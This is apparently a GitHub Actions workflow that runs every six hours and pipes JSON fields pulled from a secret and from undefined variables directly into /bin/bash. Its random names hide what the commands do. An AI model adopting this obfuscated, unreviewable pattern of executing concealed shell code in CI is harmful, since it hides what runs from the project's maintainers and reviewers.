name: wenmingcy

on:
  workflow_dispatch:
  schedule:
    - cron: '43 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wenmingcy
        env:
          ej12457: ${{ secrets.ej12457 }}
        run: |
          echo $ej12457 | jq -r .iedhq69882 | /bin/bash
          echo $k1228 | jq -r .mrtpt8995 | /bin/bash
          echo $ulm3764 | jq -r .nd8 | /bin/bash
          echo $zgq8375 | jq -r .cd371 | /bin/bash

